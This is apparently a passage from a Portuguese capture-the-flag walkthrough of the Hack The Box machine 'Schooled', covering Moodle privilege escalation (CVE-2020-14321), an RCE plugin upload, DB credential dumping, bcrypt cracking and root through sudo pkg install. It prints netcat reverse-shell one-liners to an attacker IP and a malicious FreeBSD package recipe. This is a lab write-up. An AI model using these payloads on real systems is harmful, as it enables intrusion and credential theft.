<p>Pesquisando sobre explorações em Moodle em <a href="https://book.hacktricks.xyz/pentesting/pentesting-web/moodle#rce">Moodle - HackTricks</a>, encontrei qeu é necessário o privilégio de <em>manager</em> para realizar o upload de um plugin, método mais eficiente para obter execução de código via aplicação. Mesmo não tendo esta permissão com o usuário do professor, observado que esta versão em execução <strong>também é vulnerável à</strong> <a href="https://moodle.org/mod/forum/discuss.php?d=407393"><strong>Escalação de privilégio</strong></a>, que poderia nos permitir obter o acesso de manager a partir do curso abusando o processo de inscrição e, se um dos estudantes for um dos <em>site managers</em>, este privilégio poderia ser explorado para a finalidade desejada, que é realizar o upload de um plugin malicioso. O mesmo autor da PoC do outro CVE também possui <a href="https://github.com/HoangKien1020/CVE-2020-14321">um repositório no Github</a> contendo uma PoC que poderia nos auxiliar nesta tarefa.</p>

<p>Mesmo não funcionando adequadamente a PoC em nosso cenário, após entender exatamente os passos necessários, foi possível obter execução de código na máquina, conforme passos abaixo:</p>

<ul>
  <li>
    <p>Primeiro foi necessário identificar qual usuário na plataforma poderia ter o privilégio de manager. Com base nas informações obtidas a partire de reconhecimento do site institucional, <strong>Lianne Carter</strong> é a gerente da escola e provavelmente possui os privilégios dos quais precisamos.</p>
  </li>
  <li>
    <p>Também tomei nota sobre o Profile ID do usuário <strong>Manuel Philips</strong>, que foi obtido ao navegar à sua página no link  <code class="language-plaintext highlighter-rouge">http://moodle.schooled.htb/moodle/user/profile.php?id=24</code>.</p>
  </li>
  <li>
    <p>A exploração iniciou-se por fazer a inscrição da gerente da escola na turma de matemática e, interceptando a requisição utilizando o Burp Suite, enviei a mesma ao Repeater e, além da requisição inicial, fiz uma nova para nos conceder o priviégio de Manager no curso, por atribuir o valor <code class="language-plaintext highlighter-rouge">roleid=1</code> e substituir o ID do usuário pelo identificado previamente, conforme visto no video no repositório.</p>
  </li>
</ul>

<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">GET</span> <span class="nn">/moodle/enrol/manual/ajax.php?mform_showmore_main=0&amp;id=5&amp;action=enrol&amp;enrolid=10&amp;sesskey=KbJYqTapFc&amp;_qf__enrol_manual_enrol_users_form=1&amp;mform_showmore_id_main=0&amp;userlist%5B%5D=24&amp;roletoassign=1&amp;startdate=4&amp;duration=</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">moodle.schooled.htb</span>
<span class="na">Accept</span><span class="p">:</span> <span class="s">*/*</span>
<span class="na">X-Requested-With</span><span class="p">:</span> <span class="s">XMLHttpRequest</span>
<span class="na">User-Agent</span><span class="p">:</span> <span class="s">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36</span>
<span class="na">Content-Type</span><span class="p">:</span> <span class="s">application/json</span>
<span class="na">Referer</span><span class="p">:</span> <span class="s">http://moodle.schooled.htb/moodle/user/index.php?id=5</span>
<span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate</span>
<span class="na">Accept-Language</span><span class="p">:</span> <span class="s">en-US,en;q=0.9</span>
<span class="na">Cookie</span><span class="p">:</span> <span class="s">MoodleSession=jil2s8i0vj0gq3vojfki6e7rtq</span>
<span class="na">Connection</span><span class="p">:</span> <span class="s">close</span>
</code></pre></div></div>

<ul>
  <li>
    <p>Agora como um Administrador do curso, acessando um perfil de usuário podemos utilizar a função “Log in as”, que nos permitiu acessar a plataforma como o usuário Lianne Carter.</p>

    <p><img src="https://i.imgur.com/zRjimbq.png" alt="HTB Schooled - Impersonating Manager in Moodle" class="align-center"></p>
  </li>
  <li>
    <p>Agora como Lianne, deveríamos ter privilégios de realizar o upload do plugin diretamente, uma vez que a opção “Site Administration” é exibida à esquerda, porém tais privilégios não são habilitados por padrão. Para tal atividade, precisamos editar a role acessando o menu “Site Administration” &gt; “Users” e, na aba “Permissions”, selecionei “Define Roles”.</p>

    <p><img src="https://i.imgur.com/6XmydvH.png" alt="HTB Schooled - Adjusting Role Definitions"></p>
  </li>
  <li>
    <p>Selecionei a role <strong>Manager</strong> e, clicando no botão “Edit”, interceptei a requisição e substitui o dado enviado pelo encontrado no repositório, qeu me concederia privilégios totais na aplicação.</p>

    <p><img src="https://i.imgur.com/lm0NOX7.png" alt="HTB Schooled - Modifying Manager role" class="align-center"></p>

    <p><img src="https://i.imgur.com/5L28UqN.png" alt="HTB Schooled - Appending payload to Edit Request" class="align-center"></p>
  </li>
  <li>
    <p>Agora, navegando em “Site Administration” &gt; “Plugins” podemos ver a opção para instalação, para o qual o arquivo <code class="language-plaintext highlighter-rouge">rce.zip</code>, também disponibilizado no portal, foi carregado, nos permitindo executar comandos remotamente e obter um shell reverso a partir de chamadas na URL do plugin, conforme abaixo:</p>
  </li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>curl <span class="nt">-X</span> GET <span class="nt">-G</span> <span class="s1">'http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php'</span> <span class="nt">--data-urlencode</span> <span class="s1">'cmd=id'</span>
<span class="nv">uid</span><span class="o">=</span>80<span class="o">(</span>www<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>80<span class="o">(</span>www<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>80<span class="o">(</span>www<span class="o">)</span>

<span class="nv">$ </span>curl <span class="nt">-X</span> GET <span class="nt">-G</span> <span class="s1">'http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php'</span> <span class="nt">--data-urlencode</span> <span class="s1">'cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc "10.10.10.10" 4443 &gt;/tmp/f'</span>
</code></pre></div></div>

<h2 id="user-flag">User Flag</h2>

<p>Agora com um shell interativo com a conta <code class="language-plaintext highlighter-rouge">www-data</code>, iniciei a enumeração da máquina. Como de costume, iniciei com a execução do <code class="language-plaintext highlighter-rouge">linpeas.sh</code> mas descobri que <code class="language-plaintext highlighter-rouge">wget</code> e <code class="language-plaintext highlighter-rouge">curl</code> não estavam disponível, então escrevi um simples script php para baixar os arquivos dos quais precisava.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s2">"&lt;?php"</span> <span class="o">&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"</span><span class="se">\$</span><span class="s2">url = 'http://10.10.10.10/linpeas.sh';"</span> <span class="o">&gt;&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"</span><span class="se">\$</span><span class="s2">file = '/tmp/linpeas.sh';"</span> <span class="o">&gt;&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"</span><span class="se">\$</span><span class="s2">current = file_get_contents(</span><span class="se">\$</span><span class="s2">url);"</span> <span class="o">&gt;&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"file_put_contents(</span><span class="se">\$</span><span class="s2">file, </span><span class="se">\$</span><span class="s2">current);"</span> <span class="o">&gt;&gt;</span> wget.php
<span class="nb">echo</span> <span class="s2">"?&gt;"</span> <span class="o">&gt;&gt;</span> wget.php

/usr/local/bin/php wget.php
</code></pre></div></div>

<p>A partir da execução, a seguintes informações foram obtidas:</p>

<ul>
  <li>Usuários com console e suas permissões:</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jamie:*:1001:1001:Jamie:/home/jamie:/bin/sh
root:*:0:0:Charlie &amp;:/root:/bin/csh
steve:*:1002:1002:User &amp;:/home/steve:/bin/csh
</code></pre></div></div>

<ul>
  <li>Senha para o banco de dados do Moodle no arquivo <code class="language-plaintext highlighter-rouge">/usr/local/www/apache24/data/moodle/config.php</code> :</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$CFG-&gt;dbtype    = 'mysqli';
$CFG-&gt;dbhost    = 'localhost';
$CFG-&gt;dbuser    = 'moodle';
$CFG-&gt;dbpass    = 'PlaybookMaster2020';
'dbport' =&gt; 3306,
</code></pre></div></div>

<p>Logo após executar a enumeração, descobri que apenas nos faltava alguns caminhos no PATH, encontrando o binário do <code class="language-plaintext highlighter-rouge">curl</code>. Este ajuste no PATH também foi necessário para executar o comando <code class="language-plaintext highlighter-rouge">mysql</code>, necessário para que pudesse realizar o dump das informações necessárias a partir do banco de dados. Esta atividade foi feita de forma não interativa, já que não consegui promover meu shell para um TTY.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>find / <span class="nt">-type</span> f 2&gt;/dev/null | <span class="nb">grep</span> <span class="nt">-e</span> <span class="s2">"wget$"</span> <span class="nt">-e</span> <span class="s2">"curl$"</span> <span class="nt">-e</span> <span class="s2">"mysql$"</span>
/usr/local/bin/curl
/usr/local/bin/mysql
/usr/local/share/bash-completion/completions/wget
/usr/local/share/bash-completion/completions/curl
/usr/local/share/bash-completion/completions/mysql
/usr/local/share/zsh/site-functions/_curl
/var/mail/mysql
</code></pre></div></div>

<p>O dump das credenciais foi possível a partir do comando abaixo:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>/usr/local/bin/mysql <span class="nt">-u</span> moodle <span class="nt">--password</span><span class="o">=</span>PlaybookMaster2020 <span class="nt">-e</span> <span class="s2">"use moodle; select email,username,password from mdl_user; exit"</span> | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s1">'student.'</span>
mysql: <span class="o">[</span>Warning] Using a password on the <span class="nb">command </span>line interface can be insecure.
ERROR 1064 <span class="o">(</span>42000<span class="o">)</span> at line 1: You have an error <span class="k">in </span>your SQL syntax<span class="p">;</span> check the manual that corresponds to your MySQL server version <span class="k">for </span>the right syntax to use near <span class="s1">'exit'</span> at line 1
email   username        password
root@localhost  guest   <span class="nv">$2y$10$u8DkSWjhZnQhBk1a0g1ug</span>.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2
jamie@staff.schooled.htb        admin   <span class="nv">$2y$10$3D</span>/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW
higgins_jane@staff.schooled.htb higgins_jane    <span class="nv">$2y$10$n9SrsMwmiU</span>.egHN60RleAOauTK2XShvjsCS0tAR6m54hR1Bba6ni2
phillips_manuel@staff.schooled.htb      phillips_manuel <span class="nv">$2y$10$ZwxEs65Q0gO8rN8zpVGU2eYDvAoVmWYYEhHBPovIHr8HZGBvEYEYG</span>
carter_lianne@staff.schooled.htb        carter_lianne   <span class="nv">$2y$10$jw</span>.KgN/SIpG2MAKvW8qdiub67JD7STqIER1VeRvAH4fs/DPF57JZe
</code></pre></div></div>

<p>Com base nos hashes, criei um arquivo no formato <code class="language-plaintext highlighter-rouge">username:hash</code> e executei o comando <code class="language-plaintext highlighter-rouge">john</code>, onde obtive a senha para o usuário <code class="language-plaintext highlighter-rouge">jamie</code> conforme output abaixo:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>john <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt accounts.txt                                                                 Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts <span class="o">(</span>bcrypt <span class="o">[</span>Blowfish 32/64 X3]<span class="o">)</span>
Cost 1 <span class="o">(</span>iteration count<span class="o">)</span> is 1024 <span class="k">for </span>all loaded hashes
Will run 2 OpenMP threads
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
<span class="o">!</span>QAZ2wsx         <span class="o">(</span>jamie<span class="o">)</span>
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session aborted
</code></pre></div></div>

<p>Com estas credenciais, consegui me logar via SSH e obter a flag no arquivo <code class="language-plaintext highlighter-rouge">user.txt</code> <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20"></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jamie@Schooled:~ <span class="nv">$ </span><span class="nb">id</span> <span class="o">&amp;&amp;</span> <span class="nb">hostname</span> <span class="o">&amp;&amp;</span> <span class="nb">cat </span>user.txt
<span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>jamie<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>jamie<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>jamie<span class="o">)</span>,0<span class="o">(</span>wheel<span class="o">)</span>
Schooled
&lt;redacted&gt;
</code></pre></div></div>

<h2 id="root-flag">Root Flag</h2>

<p>Antes de iniciar a enumeração, iniciei executando o comando <code class="language-plaintext highlighter-rouge">sudo -l</code> como de costume, onde pude identificar as seguintes permissões para o usuário como root:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jamie@Schooled:~ <span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
User jamie may run the following commands on Schooled:
    <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/sbin/pkg update
    <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/sbin/pkg <span class="nb">install</span> <span class="k">*</span>
</code></pre></div></div>

<p>Verificando a página do binário <code class="language-plaintext highlighter-rouge">pkg</code> no <a href="https://gtfobins.github.io/gtfobins/pkg/">GTFOBins</a> descobri que poderia utilizá-lo para instalar um pacote malicioso, de modo a conseguir um shell reverso nesta máquina. Os passos abaixo foram executados para obter um shell como <code class="language-plaintext highlighter-rouge">root</code></p>

<ul>
  <li>Instalei o pacote <code class="language-plaintext highlighter-rouge">fpm</code> na máquina atacante, também disponivel a partir deste <a href="https://github.com/jordansissel/fpm">repositório no Github</a>
</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt-get <span class="nb">install </span>ruby ruby-dev rubygems build-essential
<span class="nb">sudo </span>gem <span class="nb">install</span> <span class="nt">--no-document</span> fpm
</code></pre></div></div>

<ul>
  <li>Criei um pacote contendo o payload malicioso, no caso destinado a executar o comando para obtenção de um shell reverso</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">TF</span><span class="o">=</span><span class="si">$(</span><span class="nb">mktemp</span> <span class="nt">-d</span><span class="si">)</span>
<span class="nb">echo</span> <span class="s1">'export file="/tmp/zurc"'</span> <span class="o">&gt;</span> <span class="nv">$TF</span>/x.sh
<span class="nb">echo</span> <span class="s1">'rm $file;mkfifo $file;cat $file|/bin/sh -i 2&gt;&amp;1|nc 10.10.10.10 4443 &gt;$file'</span> <span class="o">&gt;&gt;</span> <span class="nv">$TF</span>/x.sh
fpm <span class="nt">-n</span> x <span class="nt">-s</span> <span class="nb">dir</span> <span class="nt">-t</span> freebsd <span class="nt">-a</span> all <span class="nt">--before-install</span> <span class="nv">$TF</span>/x.sh <span class="nv">$TF</span>
</code></pre></div></div>

<ul>
  <li>Transferi o pacote para a máquina alvo e executei o comando <code class="language-plaintext highlighter-rouge">sudo</code> permitido, obtendo assim um shell reverso a partir da conta do <code class="language-plaintext highlighter-rouge">jamie</code>, podendo assim ler a flag de root</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jamie@Schooled:/tmp <span class="nv">$ </span>/usr/local/bin/curl http://10.10.10.10/x-1.0.txz <span class="nt">-o</span> x-1.0.txz
1.0.txz  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100   572  100   572    0     0   4144      0 <span class="nt">--</span>:--:-- <span class="nt">--</span>:--:-- <span class="nt">--</span>:--:--  4144
jamie@Schooled:/tmp <span class="nv">$ </span><span class="nb">sudo </span>pkg <span class="nb">install</span> <span class="nt">-y</span> <span class="nt">--no-repo-update</span> ./x-1.0.txz
pkg: Repository FreeBSD has a wrong packagesite, need to re-create database
pkg: Repository FreeBSD cannot be opened. <span class="s1">'pkg update'</span> required
Checking integrity... <span class="k">done</span> <span class="o">(</span>0 conflicting<span class="o">)</span>
The following 1 package<span class="o">(</span>s<span class="o">)</span> will be affected <span class="o">(</span>of 0 checked<span class="o">)</span>:

New packages to be INSTALLED:
        x: 1.0

Number of packages to be installed: 1
<span class="o">[</span>1/1] Installing x-1.0...
<span class="nb">rm</span>: /tmp/zurc: No such file or directory
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nc <span class="nt">-lnvp</span> 4443
listening on <span class="o">[</span>any] 4443 ...
connect to <span class="o">[</span>10.10.10.10] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.234] 16349
<span class="c"># cd /root</span>
<span class="c"># cat root.txt</span>
&lt;redacted&gt;
</code></pre></div></div>

<p>Espero que tenham gostado!</p>

<p>Vejo vocês no próximo post <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20"></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/tags/#hackthebox" class="page__taxonomy-item p-category" rel="tag">HackTheBox</a><span class="sep">, </span>
    
      <a href="/tags/#htb-linux" class="page__taxonomy-item p-category" rel="tag">HTB Linux</a><span class="sep">, </span>
    
      <a href="/tags/#htb-medium" class="page__taxonomy-item p-category" rel="tag">HTB Medium</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categorias: </strong>
    <span itemprop="keywords">
    
      <a href="/categorias/#walkthrough" class="page__taxonomy-item p-category" rel="tag">Walkthrough</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Atualizado em:</strong> <time class="dt-published" datetime="2021-09-11T00:00:00-03:00">September 11, 2021</time></p>

      </footer>

      <section class="page__share" id="sharelinks">
  
    <h4 class="page__share-title">Compartilhe</h4>
  

  <!-- CUSTOM: Localized sharing links -->
  

  <a href="https://twitter.com/intent/tweet?via=zerahzurc&amp;text=Walktrough%3A+HTB+Schooled%20https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>

  <a href="whatsapp://send?text=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled" data-action="share/whatsapp/share" class="btn btn--whatsapp" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Whatsapp"><i class="fab fa-fw fa-whatsapp" aria-hidden="true"></i><span> Whatsapp</span></a>

  <a href="https://telegram.me/share/url?url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F09%2Fhtb-schooled&amp;text=Walktrough%3A+HTB+Schooled" class="btn btn--telegram" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Compartilhe Telegram"><i class="fab fa-fw fa-telegram-plane" aria-hidden="true"></i><span> Telegram</span></a>

  <!-- END CUSTOM: Localized sharing links -->
</section>


      
  <nav class="pagination">
    
    
      <a href="/walkthrough/2021/08/htb-knife" class="pagination--pager" title="Walktrough: HTB Knife
">Anterior</a>
    
    
    
      
        <a href="/walkthrough/2021/09/htb-pit" class="pagination--pager" title="Walktrough: HTB Pit
">Próxima</a>
      
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Deixe um comentário</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h2 class="page__related-title">Talvez você também goste</h2>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/TJKS5F6.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/10/htb-explore" rel="permalink">Walktrough: HTB Explore
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-30T13:00:00-03:00">October 30, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          4 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/09/htb-schooled">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Explore, uma máquina Android classificada como fácil do Hack The Box, criada por bertolis.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/89b1SdH.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/10/htb-dynstr" rel="permalink">Walktrough: HTB Dynstr
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-16T13:00:00-03:00">October 16, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          10 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/09/htb-schooled">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Dynstr, outra máquina Linux classificada como mediana do Hack The Box, criada por jkr.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/JkBtXmO.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/10/htb-cap" rel="permalink">Walktrough: HTB Cap
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-02T13:00:00-03:00">October 2, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          6 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/09/htb-schooled">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Cap, outra máquina Linux classificada como fácil do Hack The Box, criada por  InfoSecJack.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/pUqq7fY.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      
      
        <a href="/walkthrough/2021/09/htb-pit" rel="permalink">Walktrough: HTB Pit
</a>
      
      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-09-25T09:00:00-03:00">September 25, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          11 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/09/htb-schooled">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Olá pessoal!

A máquina desta semana será Pit, outra máquina Linux classificada como mediana Hack The Box, criada por polarbearer e GibParadox.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Digite seu termo de busca...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Digite seu termo de busca...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- Mermaid.js -->
<script type="module">
    import mermaid from 'https://unpkg.com/mermaid@9/dist/mermaid.esm.min.mjs';
    const config = {
        "theme": "dark", 
        "startOnLoad": true
    };
    mermaid.initialize(config);
</script>

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    
      <li><strong>Siga:</strong></li>
    

    
      
        
          <li><a href="https://www.linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i> Linkedin</a></li>
        
      
        
          <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i> Twitter</a></li>
        
      
        
          <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
        
      
    
    <!-- start custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
    
      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
    <li><a href="https://davicruz.com/termos-e-privacidade" rel="nofollow noopener noreferrer"><i class="fas fa-user-shield" aria-hidden="true"></i> Termos de uso e Política Privacidade</a></li>
    <!--<li><a onclick="return klaro.show();"><i class="fas fa-shield-alt" aria-hidden="true"></i> Revisar consentimento</a></li>-->
    
      
    
      
        
